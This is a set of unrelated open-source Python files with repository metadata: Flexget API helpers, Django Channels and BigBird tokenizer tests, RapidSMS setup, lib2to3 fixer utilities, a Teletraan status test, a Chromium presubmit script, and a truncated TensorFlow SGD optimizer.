'validator': {'type': 'string', 'description': 'The name of the failed validator.'},
'validator_value': {
'type': 'string', 'description': 'The value for the failed validator in the schema.'
},
'path': {'type': 'string'},
'schema_path': {'type': 'string'},
}
}
}
},
'required': ['validation_errors']
})
verror_attrs = (
'message', 'cause', 'validator', 'validator_value',
'path', 'schema_path', 'parent'
)
def __init__(self, validation_errors, message='validation error'):
payload = {'validation_errors': [self._verror_to_dict(error) for error in validation_errors]}
super(ValidationError, self).__init__(message, payload=payload)
def _verror_to_dict(self, error):
error_dict = {}
for attr in self.verror_attrs:
if isinstance(getattr(error, attr), deque):
error_dict[attr] = list(getattr(error, attr))
else:
error_dict[attr] = str(getattr(error, attr))
return error_dict
empty_response = api.schema_model('empty', {'type': 'object'})
def success_response(message, status_code=200, status='success'):
rsp_dict = {
'message': message,
'status_code': status_code,
'status': status
}
rsp = jsonify(rsp_dict)
rsp.status_code = status_code
return rsp
@api.errorhandler(APIError)
@api.errorhandler(NotFoundError)
@api.errorhandler(ValidationError)
@api.errorhandler(BadRequest)
@api.errorhandler(Unauthorized)
@api.errorhandler(Conflict)
@api.errorhandler(NotModified)
@api.errorhandler(PreconditionFailed)
def api_errors(error):
return error.to_dict(), error.status_code
@with_session
def api_key(session=None):
log.debug('fetching token for internal lookup')
return session.query(User).first().token
def etag(f):
"""
A decorator that add an ETag header to the response and checks for the "If-Match" and "If-Not-Match" headers to
return an appropriate response.
:param f: A GET or HEAD flask method to wrap
:return: The method's response with the ETag and Cache-Control headers, raises a 412 error or returns a 304 response
"""
@wraps(f)
def wrapped(*args, **kwargs):
# Identify if this is a GET or HEAD in order to proceed
assert request.method in ['HEAD', 'GET'], '@etag is only supported for GET requests'
rv = f(*args, **kwargs)
rv = make_response(rv)
# Some headers can change without data change for specific page
content_headers = rv.headers.get('link', '') + rv.headers.get('count', '') + rv.headers.get('total-count', '')
data = (rv.get_data().decode() + content_headers).encode()
etag = generate_etag(data)
rv.headers['Cache-Control'] = 'max-age=86400'
rv.headers['ETag'] = etag
if_match = request.headers.get('If-Match')
if_none_match = request.headers.get('If-None-Match')
if if_match:
etag_list = [tag.strip() for tag in if_match.split(',')]
if etag not in etag_list and '*' not in etag_list:
raise PreconditionFailed('etag does not match')
elif if_none_match:
etag_list = [tag.strip() for tag in if_none_match.split(',')]
if etag in etag_list or '*' in etag_list:
raise NotModified
return rv
return wrapped
def pagination_headers(total_pages, total_items, page_count, request):
"""
Creates the `Link`. 'Count' and 'Total-Count' headers, to be used for pagination traversing
:param total_pages: Total number of pages
:param total_items: Total number of items in all the pages
:param page_count: Item count for page (may differ from page size request)
:param request: The flask request used, required to build other reoccurring vars like url and such.
:return:
"""
# Build constant variables from request data
url = request.url_root + request.path.lstrip('/')
per_page = request.args.get('per_page', 50)
page = int(request.args.get('page', 1))
# Build the base template
LINKTEMPLATE = '<{}?per_page={}&'.format(url, per_page)
# Removed page and per_page from query string
query_string = re.sub(b'per_page=\d+', b'', request.query_string)
query_string = re.sub(b'page=\d+', b'', query_string)
query_string = re.sub(b'&{2,}', b'&', query_string)
# Add all original query params
LINKTEMPLATE += query_string.decode().lstrip('&') + '&page={}>; rel="{}"'
link_string = ''
if page > 1:
link_string += LINKTEMPLATE.format(page - 1, 'prev') + ', '
if page < total_pages:
link_string += LINKTEMPLATE.format(page + 1, 'next') + ', '
link_string += LINKTEMPLATE.format(total_pages, 'last')
return {
'Link': link_string,
'Total-Count': total_items,
'Count': page_count
}
|
{
"content_hash": "507b75ec0a85653664f3bf1d2ae8bb77",
"timestamp": "",
"source": "github",
"line_count": 398,
"max_line_length": 120,
"avg_line_length": 33.96733668341709,
"alnum_prop": 0.6225312523115615,
"repo_name": "OmgOhnoes/Flexget",
"id": "320db5b12b04ec8ddd6b676f2109514da9bdced0",
"size": "13519",
"binary": false,
"copies": "2",
"ref": "refs/heads/develop",
"path": "flexget/api/app.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "11875"
},
{
"name": "HTML",
"bytes": "79376"
},
{
"name": "JavaScript",
"bytes": "263723"
},
{
"name": "Python",
"bytes": "3324701"
},
{
"name": "SRecode Template",
"bytes": "3"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from django.http.cookie import parse_cookie
from channels.test import ChannelTestCase, HttpClient
class HttpClientTests(ChannelTestCase):
def test_cookies(self):
client = HttpClient()
client.set_cookie('foo', 'not-bar')
client.set_cookie('foo', 'bar')
client.set_cookie('qux', 'qu;x')
# Django's interpretation of the serialized cookie.
cookie_dict = parse_cookie(client.headers['cookie'].decode('ascii'))
self.assertEqual(client.get_cookies(),
cookie_dict)
self.assertEqual({'foo': 'bar',
'qux': 'qu;x',
'sessionid': client.get_cookies()['sessionid']},
cookie_dict)
|
{
"content_hash": "068e7adca132dace10e7385d3f9b2829",
"timestamp": "",
"source": "github",
"line_count": 24,
"max_line_length": 76,
"avg_line_length": 32.666666666666664,
"alnum_prop": 0.5803571428571429,
"repo_name": "Coread/channels",
"id": "0ec9089dd9af306ca8789ad30f5c5e7f2702ab5b",
"size": "784",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tests/test_http.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "JavaScript",
"bytes": "29400"
},
{
"name": "Makefile",
"bytes": "424"
},
{
"name": "Python",
"bytes": "232339"
}
],
"symlink_target": ""
}
|
import os
from setuptools import setup, find_packages
def read_file(filename):
"""Read a file into a string"""
path = os.path.abspath(os.path.dirname(__file__))
filepath = os.path.join(path, filename)
with open(filepath) as f:
f.read()
setup(
name="RapidSMS",
version=__import__('rapidsms').__version__,
license="BSD",
install_requires=[
"requests>=1.2.0",
"django-tables2==1.0.*",
"djappsettings>=0.4.0",
"django-selectable>=0.7.0",
],
packages=find_packages(),
include_package_data=True,
exclude_package_data={
'': ['*.pyc']
},
author="RapidSMS development community",
author_email="rapidsms@googlegroups.com",
maintainer="RapidSMS development community",
maintainer_email="rapidsms@googlegroups.com",
description="Build SMS applications with Python and Django",
long_description=read_file('README.rst'),
url="http://github.com/rapidsms/rapidsms",
test_suite="run_tests.main",
classifiers=[
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Framework :: Django',
'Development Status :: 4 - Beta',
'Operating System :: OS Independent',
],
)
|
{
"content_hash": "c61343ad2acb35595e491848b5cdc38e",
"timestamp": "",
"source": "github",
"line_count": 54,
"max_line_length": 64,
"avg_line_length": 28.796296296296298,
"alnum_prop": 0.6051446945337621,
"repo_name": "catalpainternational/rapidsms",
"id": "0f6a0355645b5edcfe7df272c17a51fcb64113e5",
"size": "1555",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "8143"
},
{
"name": "HTML",
"bytes": "27797"
},
{
"name": "JavaScript",
"bytes": "7020"
},
{
"name": "Python",
"bytes": "305443"
},
{
"name": "Shell",
"bytes": "149"
}
],
"symlink_target": ""
}
|
"""Utility functions, node construction macros, etc."""
# Author: Collin Winter
# Local imports
from .pgen2 import token
from .pytree import Leaf, Node
from .pygram import python_symbols as syms
from . import patcomp
try:
unicode
except NameError:
unicode = str
###########################################################
### Common node-construction "macros"
###########################################################
def KeywordArg(keyword, value):
return Node(syms.argument,
[keyword, Leaf(token.EQUAL, u"="), value])
def LParen():
return Leaf(token.LPAR, u"(")
def RParen():
return Leaf(token.RPAR, u")")
def Assign(target, source):
"""Build an assignment statement"""
if not isinstance(target, list):
target = [target]
if not isinstance(source, list):
source.prefix = u" "
source = [source]
return Node(syms.atom,
target + [Leaf(token.EQUAL, u"=", prefix=u" ")] + source)
def Name(name, prefix=None):
"""Return a NAME leaf"""
return Leaf(token.NAME, name, prefix=prefix)
def Attr(obj, attr):
"""A node tuple for obj.attr"""
return [obj, Node(syms.trailer, [Dot(), attr])]
def Comma():
"""A comma leaf"""
return Leaf(token.COMMA, u",")
def Dot():
"""A period (.) leaf"""
return Leaf(token.DOT, u".")
def ArgList(args, lparen=LParen(), rparen=RParen()):
"""A parenthesised argument list, used by Call()"""
node = Node(syms.trailer, [lparen.clone(), rparen.clone()])
if args:
node.insert_child(1, Node(syms.arglist, args))
return node
def Call(func_name, args=None, prefix=None):
"""A function call"""
node = Node(syms.power, [func_name, ArgList(args)])
if prefix is not None:
node.prefix = prefix
return node
def Newline():
"""A newline literal"""
return Leaf(token.NEWLINE, u"\n")
def BlankLine():
"""A blank line"""
return Leaf(token.NEWLINE, u"")
def Number(n, prefix=None):
return Leaf(token.NUMBER, n, prefix=prefix)
def Subscript(index_node):
"""A numeric or string subscript"""
return Node(syms.trailer, [Leaf(token.LBRACE, u"["),
index_node,
Leaf(token.RBRACE, u"]")])
def String(string, prefix=None):
"""A string leaf"""
return Leaf(token.STRING, string, prefix=prefix)
def ListComp(xp, fp, it, test=None):
"""A list comprehension of the form [xp for fp in it if test].
If test is None, the "if test" part is omitted.
"""
xp.prefix = u""
fp.prefix = u" "
it.prefix = u" "
for_leaf = Leaf(token.NAME, u"for")
for_leaf.prefix = u" "
in_leaf = Leaf(token.NAME, u"in")
in_leaf.prefix = u" "
inner_args = [for_leaf, fp, in_leaf, it]
if test:
test.prefix = u" "
if_leaf = Leaf(token.NAME, u"if")
if_leaf.prefix = u" "
inner_args.append(Node(syms.comp_if, [if_leaf, test]))
inner = Node(syms.listmaker, [xp, Node(syms.comp_for, inner_args)])
return Node(syms.atom,
[Leaf(token.LBRACE, u"["),
inner,
Leaf(token.RBRACE, u"]")])
def FromImport(package_name, name_leafs):
""" Return an import statement in the form:
from package import name_leafs"""
# XXX: May not handle dotted imports properly (eg, package_name='foo.bar')
#assert package_name == '.' or '.' not in package_name, "FromImport has "\
# "not been tested with dotted package names -- use at your own "\
# "peril!"
for leaf in name_leafs:
# Pull the leaves out of their old tree
leaf.remove()
children = [Leaf(token.NAME, u"from"),
Leaf(token.NAME, package_name, prefix=u" "),
Leaf(token.NAME, u"import", prefix=u" "),
Node(syms.import_as_names, name_leafs)]
imp = Node(syms.import_from, children)
return imp
###########################################################
### Determine whether a node represents a given literal
###########################################################
def is_tuple(node):
"""Does the node represent a tuple literal?"""
if isinstance(node, Node) and node.children == [LParen(), RParen()]:
return True
return (isinstance(node, Node)
and len(node.children) == 3
and isinstance(node.children[0], Leaf)
and isinstance(node.children[1], Node)
and isinstance(node.children[2], Leaf)
and node.children[0].value == u"("
and node.children[2].value == u")")
def is_list(node):
"""Does the node represent a list literal?"""
return (isinstance(node, Node)
and len(node.children) > 1
and isinstance(node.children[0], Leaf)
and isinstance(node.children[-1], Leaf)
and node.children[0].value == u"["
and node.children[-1].value == u"]")
###########################################################
### Misc
###########################################################
def parenthesize(node):
return Node(syms.atom, [LParen(), node, RParen()])
consuming_calls = set(["sorted", "list", "set", "any", "all", "tuple", "sum",
"min", "max"])
def attr_chain(obj, attr):
"""Follow an attribute chain.
If you have a chain of objects where a.foo -> b, b.foo-> c, etc,
use this to iterate over all objects in the chain. Iteration is
terminated by getattr(x, attr) is None.
Args:
obj: the starting object
attr: the name of the chaining attribute
Yields:
Each successive object in the chain.
"""
next = getattr(obj, attr)
while next:
yield next
next = getattr(next, attr)
p0 = """for_stmt< 'for' any 'in' node=any ':' any* >
| comp_for< 'for' any 'in' node=any any* >
"""
p1 = """
power<
( 'iter' | 'list' | 'tuple' | 'sorted' | 'set' | 'sum' |
'any' | 'all' | 'enumerate' | (any* trailer< '.' 'join' >) )
trailer< '(' node=any ')' >
any*
>
"""
p2 = """
power<
'sorted'
trailer< '(' arglist<node=any any*> ')' >
any*
>
"""
pats_built = False
def in_special_context(node):
""" Returns true if node is in an environment where all that is required
of it is being itterable (ie, it doesn't matter if it returns a list
or an itterator).
See test_map_nochange in test_fixers.py for some examples and tests.
"""
global p0, p1, p2, pats_built
if not pats_built:
p1 = patcomp.compile_pattern(p1)
p0 = patcomp.compile_pattern(p0)
p2 = patcomp.compile_pattern(p2)
pats_built = True
patterns = [p0, p1, p2]
for pattern, parent in zip(patterns, attr_chain(node, "parent")):
results = {}
if pattern.match(parent, results) and results["node"] is node:
return True
return False
def is_probably_builtin(node):
"""
Check that something isn't an attribute or function name etc.
"""
prev = node.prev_sibling
if prev is not None and prev.type == token.DOT:
# Attribute lookup.
return False
parent = node.parent
if parent.type in (syms.funcdef, syms.classdef):
return False
if parent.type == syms.expr_stmt and parent.children[0] is node:
# Assignment.
return False
if parent.type == syms.parameters or \
(parent.type == syms.typedargslist and (
(prev is not None and prev.type == token.COMMA) or
parent.children[0] is node
)):
# The name of an argument.
return False
return True
def find_indentation(node):
"""Find the indentation of *node*."""
while node is not None:
if node.type == syms.suite and len(node.children) > 2:
indent = node.children[1]
if indent.type == token.INDENT:
return indent.value
node = node.parent
return u""
###########################################################
### The following functions are to find bindings in a suite
###########################################################
def make_suite(node):
if node.type == syms.suite:
return node
node = node.clone()
parent, node.parent = node.parent, None
suite = Node(syms.suite, [node])
suite.parent = parent
return suite
def find_root(node):
"""Find the top level namespace."""
# Scamper up to the top level namespace
while node.type != syms.file_input:
assert node.parent, "Tree is insane! root found before "\
"file_input node was found."
node = node.parent
return node
def does_tree_import(package, name, node):
""" Returns true if name is imported from package at the
top level of the tree which node belongs to.
To cover the case of an import like 'import foo', use
None for the package and 'foo' for the name. """
binding = find_binding(name, find_root(node), package)
return bool(binding)
def is_import(node):
"""Returns true if the node is an import statement."""
return node.type in (syms.import_name, syms.import_from)
def touch_import(package, name, node):
""" Works like `does_tree_import` but adds an import statement
if it was not imported. """
def is_import_stmt(node):
return (node.type == syms.simple_stmt and node.children and
is_import(node.children[0]))
root = find_root(node)
if does_tree_import(package, name, root):
return
# figure out where to insert the new import. First try to find
# the first import and then skip to the last one.
insert_pos = offset = 0
for idx, node in enumerate(root.children):
if not is_import_stmt(node):
continue
for offset, node2 in enumerate(root.children[idx:]):
if not is_import_stmt(node2):
break
insert_pos = idx + offset
break
# if there are no imports where we can insert, find the docstring.
# if that also fails, we stick to the beginning of the file
if insert_pos == 0:
for idx, node in enumerate(root.children):
if (node.type == syms.simple_stmt and node.children and
node.children[0].type == token.STRING):
insert_pos = idx + 1
break
if package is None:
import_ = Node(syms.import_name, [
Leaf(token.NAME, u"import"),
Leaf(token.NAME, name, prefix=u" ")
])
else:
import_ = FromImport(package, [Leaf(token.NAME, name, prefix=u" ")])
children = [import_, Newline()]
root.insert_child(insert_pos, Node(syms.simple_stmt, children))
_def_syms = set([syms.classdef, syms.funcdef])
def find_binding(name, node, package=None):
""" Returns the node which binds variable name, otherwise None.
If optional argument package is supplied, only imports will
be returned.
See test cases for examples."""
for child in node.children:
ret = None
if child.type == syms.for_stmt:
if _find(name, child.children[1]):
return child
n = find_binding(name, make_suite(child.children[-1]), package)
if n: ret = n
elif child.type in (syms.if_stmt, syms.while_stmt):
n = find_binding(name, make_suite(child.children[-1]), package)
if n: ret = n
elif child.type == syms.try_stmt:
n = find_binding(name, make_suite(child.children[2]), package)
if n:
ret = n
else:
for i, kid in enumerate(child.children[3:]):
if kid.type == token.COLON and kid.value == ":":
# i+3 is the colon, i+4 is the suite
n = find_binding(name, make_suite(child.children[i+4]), package)
if n: ret = n
elif child.type in _def_syms and child.children[1].value == name:
ret = child
elif _is_import_binding(child, name, package):
ret = child
elif child.type == syms.simple_stmt:
ret = find_binding(name, child, package)
elif child.type == syms.expr_stmt:
if _find(name, child.children[0]):
ret = child
if ret:
if not package:
return ret
if is_import(ret):
return ret
return None
_block_syms = set([syms.funcdef, syms.classdef, syms.trailer])
def _find(name, node):
nodes = [node]
while nodes:
node = nodes.pop()
if node.type > 256 and node.type not in _block_syms:
nodes.extend(node.children)
elif node.type == token.NAME and node.value == name:
return node
return None
def _is_import_binding(node, name, package=None):
""" Will reuturn node if node will import name, or node
will import * from package. None is returned otherwise.
See test cases for examples. """
if node.type == syms.import_name and not package:
imp = node.children[1]
if imp.type == syms.dotted_as_names:
for child in imp.children:
if child.type == syms.dotted_as_name:
if child.children[2].value == name:
return node
elif child.type == token.NAME and child.value == name:
return node
elif imp.type == syms.dotted_as_name:
last = imp.children[-1]
if last.type == token.NAME and last.value == name:
return node
elif imp.type == token.NAME and imp.value == name:
return node
elif node.type == syms.import_from:
# unicode(...) is used to make life easier here, because
# from a.b import parses to ['import', ['a', '.', 'b'], ...]
if package and unicode(node.children[1]).strip() != package:
return None
n = node.children[3]
if package and _find(u"as", n):
# See test_from_import_as for explanation
return None
elif n.type == syms.import_as_names and _find(name, n):
return node
elif n.type == syms.import_as_name:
child = n.children[2]
if child.type == token.NAME and child.value == name:
return node
elif n.type == token.NAME and n.value == name:
return node
elif package and n.type == token.STAR:
return node
return None
|
{
"content_hash": "3f310ddf39bce1ccb457b4359d333ef5",
"timestamp": "",
"source": "github",
"line_count": 437,
"max_line_length": 88,
"avg_line_length": 33.45080091533181,
"alnum_prop": 0.5580106717745246,
"repo_name": "liamcurry/py3kwarn",
"id": "e16cdb668913661a7dba9c203844fd11ea6f8c4c",
"size": "14618",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "py3kwarn2to3/fixer_util.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "632424"
}
],
"symlink_target": ""
}
|
import os
import unittest
from transformers import BigBirdTokenizer, BigBirdTokenizerFast
from transformers.file_utils import cached_property
from transformers.testing_utils import require_sentencepiece, require_tokenizers, require_torch, slow
from .test_tokenization_common import TokenizerTesterMixin
SPIECE_UNDERLINE = "▁"
SAMPLE_VOCAB = os.path.join(os.path.dirname(os.path.abspath(__file__)), "fixtures/test_sentencepiece.model")
@require_sentencepiece
@require_tokenizers
class BigBirdTokenizationTest(TokenizerTesterMixin, unittest.TestCase):
tokenizer_class = BigBirdTokenizer
rust_tokenizer_class = BigBirdTokenizerFast
test_rust_tokenizer = True
test_sentencepiece = True
def setUp(self):
super().setUp()
tokenizer = self.tokenizer_class(SAMPLE_VOCAB, keep_accents=True)
tokenizer.save_pretrained(self.tmpdirname)
def test_rust_and_python_full_tokenizers(self):
if not self.test_rust_tokenizer:
return
tokenizer = self.get_tokenizer()
rust_tokenizer = self.get_rust_tokenizer()
sequence = "I was born in 92000, and this is falsé."
tokens = tokenizer.tokenize(sequence)
rust_tokens = rust_tokenizer.tokenize(sequence)
self.assertListEqual(tokens, rust_tokens)
ids = tokenizer.encode(sequence, add_special_tokens=False)
rust_ids = rust_tokenizer.encode(sequence, add_special_tokens=False)
self.assertListEqual(ids, rust_ids)
rust_tokenizer = self.get_rust_tokenizer()
ids = tokenizer.encode(sequence)
rust_ids = rust_tokenizer.encode(sequence)
self.assertListEqual(ids, rust_ids)
def test_full_tokenizer(self):
tokenizer = BigBirdTokenizer(SAMPLE_VOCAB, keep_accents=True)
tokens = tokenizer.tokenize("This is a test")
self.assertListEqual(tokens, ["▁This", "▁is", "▁a", "▁t", "est"])
self.assertListEqual(
tokenizer.convert_tokens_to_ids(tokens),
[285, 46, 10, 170, 382],
)
tokens = tokenizer.tokenize("I was born in 92000, and this is falsé.")
self.assertListEqual(
tokens,
[
SPIECE_UNDERLINE + "I",
SPIECE_UNDERLINE + "was",
SPIECE_UNDERLINE + "b",
"or",
"n",
SPIECE_UNDERLINE + "in",
SPIECE_UNDERLINE + "",
"9",
"2",
"0",
"0",
"0",
",",
SPIECE_UNDERLINE + "and",
SPIECE_UNDERLINE + "this",
SPIECE_UNDERLINE + "is",
SPIECE_UNDERLINE + "f",
"al",
"s",
"é",
".",
],
)
ids = tokenizer.convert_tokens_to_ids(tokens)
self.assertListEqual(
ids,
[8, 21, 84, 55, 24, 19, 7, 0, 602, 347, 347, 347, 3, 12, 66, 46, 72, 80, 6, 0, 4],
)
back_tokens = tokenizer.convert_ids_to_tokens(ids)
self.assertListEqual(
back_tokens,
[
SPIECE_UNDERLINE + "I",
SPIECE_UNDERLINE + "was",
SPIECE_UNDERLINE + "b",
"or",
"n",
SPIECE_UNDERLINE + "in",
SPIECE_UNDERLINE + "",
"<unk>",
"2",
"0",
"0",
"0",
",",
SPIECE_UNDERLINE + "and",
SPIECE_UNDERLINE + "this",
SPIECE_UNDERLINE + "is",
SPIECE_UNDERLINE + "f",
"al",
"s",
"<unk>",
".",
],
)
@cached_property
def big_tokenizer(self):
return BigBirdTokenizer.from_pretrained("google/bigbird-roberta-base")
@slow
def test_tokenization_base_easy_symbols(self):
symbols = "Hello World!"
original_tokenizer_encodings = [65, 18536, 2260, 101, 66]
self.assertListEqual(original_tokenizer_encodings, self.big_tokenizer.encode(symbols))
@slow
def test_tokenization_base_hard_symbols(self):
symbols = 'This is a very long text with a lot of weird characters, such as: . , ~ ? ( ) " [ ] ! : - . Also we will add words that should not exsist and be tokenized to <unk>, such as saoneuhaoesuth'
# fmt: off
original_tokenizer_encodings = [65, 871, 419, 358, 946, 991, 2521, 452, 358, 1357, 387, 7751, 3536, 112, 985, 456, 126, 865, 938, 5400, 5734, 458, 1368, 467, 786, 2462, 5246, 1159, 633, 865, 4519, 457, 582, 852, 2557, 427, 916, 508, 405, 34324, 497, 391, 408, 11342, 1244, 385, 100, 938, 985, 456, 574, 362, 12597, 3200, 3129, 1172, 66] # noqa: E231
# fmt: on
self.assertListEqual(original_tokenizer_encodings, self.big_tokenizer.encode(symbols))
@require_torch
@slow
def test_torch_encode_plus_sent_to_model(self):
import torch
from transformers import BigBirdConfig, BigBirdModel
# Build sequence
first_ten_tokens = list(self.big_tokenizer.get_vocab().keys())[:10]
sequence = " ".join(first_ten_tokens)
encoded_sequence = self.big_tokenizer.encode_plus(sequence, return_tensors="pt", return_token_type_ids=False)
batch_encoded_sequence = self.big_tokenizer.batch_encode_plus(
[sequence + " " + sequence], return_tensors="pt", return_token_type_ids=False
)
config = BigBirdConfig(attention_type="original_full")
model = BigBirdModel(config)
assert model.get_input_embeddings().weight.shape[0] >= self.big_tokenizer.vocab_size
with torch.no_grad():
model(**encoded_sequence)
model(**batch_encoded_sequence)
@slow
def test_special_tokens(self):
"""
To reproduce:
$ wget https://github.com/google-research/bigbird/blob/master/bigbird/vocab/gpt2.model?raw=true
$ mv gpt2.model?raw=true gpt2.model
```
import tensorflow_text as tft
import tensorflow as tf
vocab_model_file = "./gpt2.model"
tokenizer = tft.SentencepieceTokenizer(model=tf.io.gfile.GFile(vocab_model_file, "rb").read()))
ids = tokenizer.tokenize("Paris is the [MASK].")
ids = tf.concat([tf.constant([65]), ids, tf.constant([66])], axis=0)
detokenized = tokenizer.detokenize(ids) # should give [CLS] Paris is the [MASK].[SEP]
"""
tokenizer = BigBirdTokenizer.from_pretrained("google/bigbird-roberta-base")
decoded_text = tokenizer.decode(tokenizer("Paris is the [MASK].").input_ids)
self.assertTrue(decoded_text == "[CLS] Paris is the [MASK].[SEP]")
|
{
"content_hash": "b53715f4dc6d5ab67df81579cbd15014",
"timestamp": "",
"source": "github",
"line_count": 189,
"max_line_length": 358,
"avg_line_length": 36.116402116402114,
"alnum_prop": 0.5736888368004688,
"repo_name": "huggingface/pytorch-transformers",
"id": "c4d700cad6bd68fe64f83ff0c70e433c1cd406a0",
"size": "7461",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_tokenization_big_bird.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "194"
},
{
"name": "Jupyter Notebook",
"bytes": "535623"
},
{
"name": "Python",
"bytes": "897445"
}
],
"symlink_target": ""
}
|
from django.conf import settings
|
{
"content_hash": "e060bb020a0b0d1fc2fbe39995eb6505",
"timestamp": "",
"source": "github",
"line_count": 1,
"max_line_length": 32,
"avg_line_length": 33,
"alnum_prop": 0.8484848484848485,
"repo_name": "yunojuno/django-sample-app",
"id": "7ad28dc4f2f6e42e6bab867dea1075c17ec83dfa",
"size": "75",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "my_app/settings.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "4354"
}
],
"symlink_target": ""
}
|
import os
import tempfile
import unittest
import tests
from deployd.common.types import DeployStatus, BuildInfo, DeployStage, AgentStatus
from deployd.common.env_status import EnvStatus
from deployd.types.ping_report import PingReport
class TestStatusFunction(tests.TestCase):
def test_load_dump_file(self):
fn = tempfile.mkstemp()[1]
env_status = EnvStatus(fn)
status1 = DeployStatus()
ping_report = {}
ping_report['deployId'] = 'deploy1'
ping_report['envId'] = 'envId1'
ping_report['envName'] = 'env1'
ping_report['stageName'] = 'beta'
ping_report['deployStage'] = DeployStage.POST_RESTART
ping_report['status'] = AgentStatus.AGENT_FAILED
ping_report['errorCode'] = 1
ping_report['errorMessage'] = 'Fail to open files'
status1.report = PingReport(jsonValue=ping_report)
status1.build_info = BuildInfo(commit='abc', build_url='http://google.com', build_id='234')
status2 = DeployStatus()
ping_report = {}
ping_report['deployId'] = 'deploy2'
ping_report['envId'] = 'envId2'
ping_report['envName'] = 'env2'
ping_report['stageName'] = 'prod'
ping_report['deployStage'] = DeployStage.SERVING_BUILD
ping_report['status'] = AgentStatus.SUCCEEDED
status2.report = PingReport(jsonValue=ping_report)
status2.build_info = BuildInfo(commit='bcd', build_url='http://pinterest.com',
build_id='234')
envs = {
'env1': status1,
'env2': status2}
env_status.dump_envs(envs)
envs2 = env_status.load_envs()
self.assertEqual(envs['env1'].report.status, envs2['env1'].report.status)
self.assertEqual(envs['env1'].report.errorMessage, envs2['env1'].report.errorMessage)
self.assertEqual(envs['env1'].build_info.build_commit,
envs2['env1'].build_info.build_commit)
self.assertEqual(envs['env2'].report.deployStage, envs2['env2'].report.deployStage)
self.assertEqual(envs['env2'].build_info.build_url, envs2['env2'].build_info.build_url)
os.remove(fn)
def test_load_non_exist_file(self):
fn = tempfile.mkstemp()[1]
env_status = EnvStatus(fn)
envs = env_status.load_envs()
self.assertEqual(envs, {})
def test_bad_format(self):
fn = tempfile.mkstemp()[1]
contents = '{' \
' "env1": {' \
' "deployId": "1",' \
' "deployStage": 3,'
with open(fn, 'w') as f:
f.write(contents)
env_status = EnvStatus(fn)
envs = env_status.load_envs()
self.assertEqual(envs, {})
os.remove(fn)
if __name__ == '__main__':
unittest.main()
|
{
"content_hash": "ad03001a78eb476eaa4e569345f7d71c",
"timestamp": "",
"source": "github",
"line_count": 76,
"max_line_length": 99,
"avg_line_length": 37.25,
"alnum_prop": 0.5913104909925821,
"repo_name": "pinterest/teletraan",
"id": "11ee677eea114a4731aae5845c8a9ae44191c3ca",
"size": "3417",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "deploy-agent/tests/unit/deploy/utils/test_status.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "159647"
},
{
"name": "Dockerfile",
"bytes": "423"
},
{
"name": "HTML",
"bytes": "345697"
},
{
"name": "Java",
"bytes": "1308657"
},
{
"name": "JavaScript",
"bytes": "2580910"
},
{
"name": "Makefile",
"bytes": "185"
},
{
"name": "Python",
"bytes": "770658"
},
{
"name": "Shell",
"bytes": "21356"
}
],
"symlink_target": ""
}
|
"""Top-level presubmit script for services/viz."""
USE_PYTHON3 = True
def CheckChangeOnUpload(input_api, output_api):
import sys
original_sys_path = sys.path
sys.path = sys.path + [input_api.os_path.join(
input_api.change.RepositoryRoot(),
'components', 'viz')]
import presubmit_checks as ps
allowlist=(r'^services[\\/]viz[\\/].*\.(cc|h)$',)
return ps.RunAllChecks(input_api, output_api, allowlist)
|
{
"content_hash": "7e70a9de688364e14322e0f495ff839a",
"timestamp": "",
"source": "github",
"line_count": 15,
"max_line_length": 58,
"avg_line_length": 28.466666666666665,
"alnum_prop": 0.6768149882903981,
"repo_name": "chromium/chromium",
"id": "299e3aaad4ad1b224db47ffe14301dfc1176bd59",
"size": "568",
"binary": false,
"copies": "6",
"ref": "refs/heads/main",
"path": "services/viz/PRESUBMIT.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
}
|
"""Momentum for TensorFlow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import ops
from tensorflow.python.keras.optimizer_v2 import optimizer_v2
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.training import training_ops
class SGD(optimizer_v2.OptimizerV2):
"""Stochastic gradient descent optimizer.
Computes:
```
variable -= learning_rate * gradient
```
Some of the args below are hyperparameters, where a hyperparameter is
defined as a scalar Tensor, a regular Python value, or a callable (which
will be evaluated when `apply_gradients` is called) returning a scalar
Tensor or a Python value.
@compatibility(eager)
When eager execution is enabled, learning_rate can be a callable that takes
no arguments and returns the actual value to use. This can be useful for
changing these values across different invocations of optimizer functions.
@end_compatibility
Arguments:
learning_rate: float hyperparameter >= 0. Learning rate.
name: Optional name prefix for the operations created when applying
gradients. Defaults to 'SGD'.
"""
def __init__(self,
learning_rate=0.001,
momentum=None,
nesterov=False,
name="SGD"):
super(SGD, self).__init__(name)
self._set_hyper("learning_rate", learning_rate)
def _apply_dense(self, grad, var):
return training_ops.apply_gradient_descent(
var,
math_ops.cast(self._get_hyper("learning_rate"), var.dtype.base_dtype),
grad,
use_locking=self._use_locking).op
def _resource_apply_dense(self, grad, var):
return training_ops.resource_apply_gradient_descent(
var.handle,
math_ops.cast(self._get_hyper("learning_rate"), var.dtype.base_dtype),
grad,
use_locking=self._use_locking)
def _resource_apply_sparse_duplicate_indices(self, grad, handle, indices):
return resource_variable_ops.resource_scatter_add(
